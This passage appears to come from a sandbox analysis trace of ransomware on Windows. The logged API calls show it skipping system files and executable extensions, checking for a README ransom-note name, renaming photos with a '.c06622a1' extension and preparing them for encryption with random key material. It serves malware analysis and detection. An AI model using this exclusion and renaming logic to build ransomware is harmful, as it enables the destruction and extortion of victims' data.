(_Str1="ntuser.ini", _Str2="GRW0yCfV58-.gif") returned 7 [0167.655] wcslen (_String="ntuser.ini") returned 0xa [0167.655] _wcsicmp (_Str1="thumbs.db", _Str2="GRW0yCfV58-.gif") returned 13 [0167.655] wcslen (_String="thumbs.db") returned 0x9 [0167.655] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0167.655] wcslen (_String="386") returned 0x3 [0167.655] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0167.655] wcslen (_String="adv") returned 0x3 [0167.655] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0167.655] wcslen (_String="ani") returned 0x3 [0167.655] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0167.655] wcslen (_String="bat") returned 0x3 [0167.655] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0167.655] wcslen (_String="bin") returned 0x3 [0167.655] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0167.655] wcslen (_String="cab") returned 0x3 [0167.655] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0167.655] wcslen (_String="cmd") returned 0x3 [0167.655] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0167.655] wcslen (_String="com") returned 0x3 [0167.655] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0167.655] wcslen (_String="cpl") returned 0x3 [0167.655] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0167.655] wcslen (_String="cur") returned 0x3 [0167.656] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0167.656] wcslen (_String="deskthemepack") returned 0xd [0167.656] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0167.656] wcslen (_String="diagcab") returned 0x7 [0167.656] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0167.656] wcslen (_String="diagcfg") returned 0x7 [0167.656] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0167.656] wcslen (_String="diagpkg") returned 0x7 [0167.656] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0167.656] wcslen (_String="dll") returned 0x3 [0167.656] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0167.656] wcslen (_String="drv") returned 0x3 [0167.656] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0167.656] wcslen (_String="exe") returned 0x3 [0167.656] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0167.656] wcslen (_String="hlp") returned 0x3 [0167.656] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0167.656] wcslen (_String="icl") returned 0x3 [0167.656] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0167.656] wcslen (_String="icns") returned 0x4 [0167.656] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0167.656] wcslen (_String="ico") returned 0x3 [0167.656] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0167.656] wcslen (_String="ics") returned 0x3 [0167.656] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0167.656] wcslen (_String="idx") returned 0x3 [0167.656] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0167.656] wcslen (_String="ldf") returned 0x3 [0167.656] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0167.656] wcslen (_String="lnk") returned 0x3 [0167.656] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0167.656] wcslen (_String="mod") returned 0x3 [0167.656] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0167.656] wcslen (_String="mpa") returned 0x3 [0167.656] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0167.657] wcslen (_String="msc") returned 0x3 [0167.657] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0167.657] wcslen (_String="msp") returned 0x3 [0167.657] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0167.657] wcslen (_String="msstyles") returned 0x8 [0167.657] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0167.657] wcslen (_String="msu") returned 0x3 [0167.657] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0167.657] wcslen (_String="nls") returned 0x3 [0167.657] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0167.657] wcslen (_String="nomedia") returned 0x7 [0167.657] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0167.657] wcslen (_String="ocx") returned 0x3 [0167.657] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0167.657] wcslen (_String="prf") returned 0x3 [0167.657] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0167.657] wcslen (_String="ps1") returned 0x3 [0167.657] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0167.657] wcslen (_String="rom") returned 0x3 [0167.657] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0167.657] wcslen (_String="rtp") returned 0x3 [0167.657] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0167.657] wcslen (_String="scr") returned 0x3 [0167.657] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0167.657] wcslen (_String="shs") returned 0x3 [0167.657] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0167.657] wcslen (_String="spl") returned 0x3 [0167.657] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0167.657] wcslen (_String="sys") returned 0x3 [0167.657] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0167.657] wcslen (_String="theme") returned 0x5 [0167.657] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0167.657] wcslen (_String="themepack") returned 0x9 [0167.657] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0167.658] wcslen (_String="wpx") returned 0x3 [0167.658] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0167.658] wcslen (_String="lock") returned 0x4 [0167.658] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0167.658] wcslen (_String="key") returned 0x3 [0167.658] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0167.658] wcslen (_String="hta") returned 0x3 [0167.658] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0167.658] wcslen (_String="msi") returned 0x3 [0167.658] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0167.658] wcslen (_String="pdb") returned 0x3 [0167.658] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0167.658] wcslen (_String="sqlite") returned 0x6 [0167.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l")) returned 0x10 [0167.658] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0167.658] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" [0167.658] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned 0x4e [0167.658] wcscpy (in: _Dest=0x32a212e, _Source="GRW0yCfV58-.gif" | out: _Dest="GRW0yCfV58-.gif") returned="GRW0yCfV58-.gif" [0167.658] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GRW0yCfV58-.gif", dwFileAttributes=0x80) returned 1 [0167.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GRW0yCfV58-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\grw0ycfv58-.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0167.659] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.659] ReadFile (in: hFile=0x1f4, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0167.660] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x69819b35 [0167.660] RtlComputeCrc32 (PartialCrc=0x9b35, Buffer=0x32e4a4, Length=0x80) returned 0xe0a3654d [0167.660] RtlComputeCrc32 (PartialCrc=0x654d, Buffer=0x32e4a4, Length=0x80) returned 0x86e09c45 [0167.660] RtlComputeCrc32 (PartialCrc=0x9c45, Buffer=0x32e4a4, Length=0x80) returned 0xd7f99086 [0167.660] RtlComputeCrc32 (PartialCrc=0x9086, Buffer=0x32e4a4, Length=0x80) returned 0xb27cdbfa [0167.660] CloseHandle (hObject=0x1f4) returned 1 [0167.660] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0167.660] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GRW0yCfV58-.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GRW0yCfV58-.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GRW0yCfV58-.gif" [0167.660] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GRW0yCfV58-.gif") returned 0x5e [0167.660] wcscpy (in: _Dest=0x32b2154, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.660] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GRW0yCfV58-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\grw0ycfv58-.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GRW0yCfV58-.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\grw0ycfv58-.gif.c06622a1"), dwFlags=0x8) returned 1 [0167.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GRW0yCfV58-.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\grw0ycfv58-.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f4 [0167.662] CreateIoCompletionPort (FileHandle=0x1f4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.662] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3710020 [0167.670] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78e4e85 [0167.670] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b900308 [0167.670] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x9827db7 [0167.670] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x38024d5c [0167.670] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ec5a90 [0167.670] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xff8c5d6 [0167.670] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x369bc666 [0167.670] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4354be6c [0167.674] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3710094, Length=0x80) returned 0xeff441db [0167.674] RtlComputeCrc32 (PartialCrc=0x41db, Buffer=0x3710094, Length=0x80) returned 0x73206190 [0167.674] RtlComputeCrc32 (PartialCrc=0x6190, Buffer=0x3710094, Length=0x80) returned 0x10ed3b64 [0167.674] RtlComputeCrc32 (PartialCrc=0x3b64, Buffer=0x3710094, Length=0x80) returned 0x979e5f3e [0167.674] RtlComputeCrc32 (PartialCrc=0x5f3e, Buffer=0x3710094, Length=0x80) returned 0x8330744c [0167.674] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3710020) returned 1 [0167.674] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0167.674] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0167.674] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadf1b470, ftCreationTime.dwHighDateTime=0x1d5df89, ftLastAccessTime.dwLowDateTime=0xefbc7310, ftLastAccessTime.dwHighDateTime=0x1d5e75c, ftLastWriteTime.dwLowDateTime=0xefbc7310, ftLastWriteTime.dwHighDateTime=0x1d5e75c, nFileSizeHigh=0x0, nFileSizeLow=0x13df, dwReserved0=0x0, dwReserved1=0x0, cFileName="GyZvF1howoUVN3.bmp", cAlternateFileName="GYZVF1~1.BMP")) returned 1 [0167.674] _wcsicmp (_Str1="GyZvF1howoUVN3.bmp", _Str2="README.c06622a1.TXT") returned -11 [0167.674] wcsstr (_Str="GyZvF1howoUVN3.bmp", _SubStr="README") returned 0x0 [0167.674] _wcsicmp (_Str1="autorun.inf", _Str2="GyZvF1howoUVN3.bmp") returned -6 [0167.674] wcslen (_String="autorun.inf") returned 0xb [0167.674] _wcsicmp (_Str1="boot.ini", _Str2="GyZvF1howoUVN3.bmp") returned -5 [0167.674] wcslen (_String="boot.ini") returned 0x8 [0167.674] _wcsicmp (_Str1="bootfont.bin", _Str2="GyZvF1howoUVN3.bmp") returned -5 [0167.674] wcslen (_String="bootfont.bin") returned 0xc [0167.674] _wcsicmp (_Str1="bootsect.bak", _Str2="GyZvF1howoUVN3.bmp") returned -5 [0167.674] wcslen (_String="bootsect.bak") returned 0xc [0167.674] _wcsicmp (_Str1="desktop.ini", _Str2="GyZvF1howoUVN3.bmp") returned -3 [0167.674] wcslen (_String="desktop.ini") returned 0xb [0167.674] _wcsicmp (_Str1="iconcache.db", _Str2="GyZvF1howoUVN3.bmp") returned 2 [0167.674] wcslen (_String="iconcache.db") returned 0xc [0167.674] _wcsicmp (_Str1="ntldr", _Str2="GyZvF1howoUVN3.bmp") returned 7 [0167.674] wcslen (_String="ntldr") returned 0x5 [0167.674] _wcsicmp (_Str1="ntuser.dat", _Str2="GyZvF1howoUVN3.bmp") returned 7 [0167.674] wcslen (_String="ntuser.dat") returned 0xa [0167.674] _wcsicmp (_Str1="ntuser.dat.log", _Str2="GyZvF1howoUVN3.bmp") returned 7 [0167.675] wcslen (_String="ntuser.dat.log") returned 0xe [0167.675] _wcsicmp (_Str1="ntuser.ini", _Str2="GyZvF1howoUVN3.bmp") returned 7 [0167.675] wcslen (_String="ntuser.ini") returned 0xa [0167.675] _wcsicmp (_Str1="thumbs.db", _Str2="GyZvF1howoUVN3.bmp") returned 13 [0167.675] wcslen (_String="thumbs.db") returned 0x9 [0167.675] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0167.675] wcslen (_String="386") returned 0x3 [0167.675] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0167.675] wcslen (_String="adv") returned 0x3 [0167.675] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0167.675] wcslen (_String="ani") returned 0x3 [0167.675] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0167.675] wcslen (_String="bat") returned 0x3 [0167.675] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0167.675] wcslen (_String="bin") returned 0x3 [0167.675] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0167.675] wcslen (_String="cab") returned 0x3 [0167.675] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0167.675] wcslen (_String="cmd") returned 0x3 [0167.675] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0167.675] wcslen (_String="com") returned 0x3 [0167.675] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0167.675] wcslen (_String="cpl") returned 0x3 [0167.675] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0167.675] wcslen (_String="cur") returned 0x3 [0167.675] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0167.675] wcslen (_String="deskthemepack") returned 0xd [0167.675] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0167.675] wcslen (_String="diagcab") returned 0x7 [0167.675] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0167.675] wcslen (_String="diagcfg") returned 0x7 [0167.675] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0167.675] wcslen (_String="diagpkg") returned 0x7 [0167.676] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0167.676] wcslen (_String="dll") returned 0x3 [0167.676] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0167.676] wcslen (_String="drv") returned 0x3 [0167.676] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0167.676] wcslen (_String="exe") returned 0x3 [0167.676] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0167.676] wcslen (_String="hlp") returned 0x3 [0167.676] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0167.676] wcslen (_String="icl") returned 0x3 [0167.676] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0167.676] wcslen (_String="icns") returned 0x4 [0167.676] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0167.676] wcslen (_String="ico") returned 0x3 [0167.676] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0167.676] wcslen (_String="ics") returned 0x3 [0167.676] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0167.676] wcslen (_String="idx") returned 0x3 [0167.676] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0167.676] wcslen (_String="ldf") returned 0x3 [0167.676] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0167.676] wcslen (_String="lnk") returned 0x3 [0167.676] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0167.676] wcslen (_String="mod") returned 0x3 [0167.676] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0167.676] wcslen (_String="mpa") returned 0x3 [0167.676] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0167.676] wcslen (_String="msc") returned 0x3 [0167.676] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0167.676] wcslen (_String="msp") returned 0x3 [0167.676] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0167.676] wcslen (_String="msstyles") returned 0x8 [0167.676] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0167.676] wcslen (_String="msu") returned 0x3 [0167.677] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0167.677] wcslen (_String="nls") returned 0x3 [0167.677] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0167.677] wcslen (_String="nomedia") returned 0x7 [0167.677] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0167.677] wcslen (_String="ocx") returned 0x3 [0167.677] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0167.677] wcslen (_String="prf") returned 0x3 [0167.677] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0167.677] wcslen (_String="ps1") returned 0x3 [0167.677] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0167.677] wcslen (_String="rom") returned 0x3 [0167.677] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0167.677] wcslen (_String="rtp") returned 0x3 [0167.677] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0167.677] wcslen (_String="scr") returned 0x3 [0167.677] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0167.677] wcslen (_String="shs") returned 0x3 [0167.677] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0167.677] wcslen (_String="spl") returned 0x3 [0167.677] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0167.677] wcslen (_String="sys") returned 0x3 [0167.677] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0167.677] wcslen (_String="theme") returned 0x5 [0167.677] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0167.677] wcslen (_String="themepack") returned 0x9 [0167.677] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0167.677] wcslen (_String="wpx") returned 0x3 [0167.677] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0167.677] wcslen (_String="lock") returned 0x4 [0167.677] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0167.678] wcslen (_String="key") returned 0x3 [0167.678] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0167.678] wcslen (_String="hta") returned 0x3 [0167.678] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0167.678] wcslen (_String="msi") returned 0x3 [0167.678] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0167.678] wcslen (_String="pdb") returned 0x3 [0167.678] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0167.678] wcslen (_String="sqlite") returned 0x6 [0167.678] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l")) returned 0x10 [0167.678] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0167.678] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" [0167.678] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned 0x4e [0167.678] wcscpy (in: _Dest=0x32a212e, _Source="GyZvF1howoUVN3.bmp" | out: _Dest="GyZvF1howoUVN3.bmp") returned="GyZvF1howoUVN3.bmp" [0167.678] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GyZvF1howoUVN3.bmp", dwFileAttributes=0x80) returned 1 [0167.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GyZvF1howoUVN3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\gyzvf1howouvn3.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0167.679] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.679] ReadFile (in: hFile=0x1a0, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0167.683] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0xeb637b1f [0167.683] RtlComputeCrc32 (PartialCrc=0x7b1f, Buffer=0x32e4a4, Length=0x80) returned 0xfb962990 [0167.683] RtlComputeCrc32 (PartialCrc=0x2990, Buffer=0x32e4a4, Length=0x80) returned 0xb20257f4 [0167.683] RtlComputeCrc32 (PartialCrc=0x57f4, Buffer=0x32e4a4, Length=0x80) returned 0x835833 [0167.683] RtlComputeCrc32 (PartialCrc=0x5833, Buffer=0x32e4a4, Length=0x80) returned 0x14a6d656 [0167.683] CloseHandle (hObject=0x1a0) returned 1 [0167.683] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0167.683] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GyZvF1howoUVN3.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GyZvF1howoUVN3.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GyZvF1howoUVN3.bmp" [0167.683] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GyZvF1howoUVN3.bmp") returned 0x61 [0167.683] wcscpy (in: _Dest=0x32b215a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.683] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GyZvF1howoUVN3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\gyzvf1howouvn3.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GyZvF1howoUVN3.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\gyzvf1howouvn3.bmp.c06622a1"), dwFlags=0x8) returned 1 [0167.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\GyZvF1howoUVN3.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\gyzvf1howouvn3.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0167.698] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.698] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x37a0020 [0167.707] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3055b030 [0167.707] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29ba4fdb [0167.707] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x733feaa3 [0167.707] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71a0e10e [0167.707] RtlRandomEx (in: 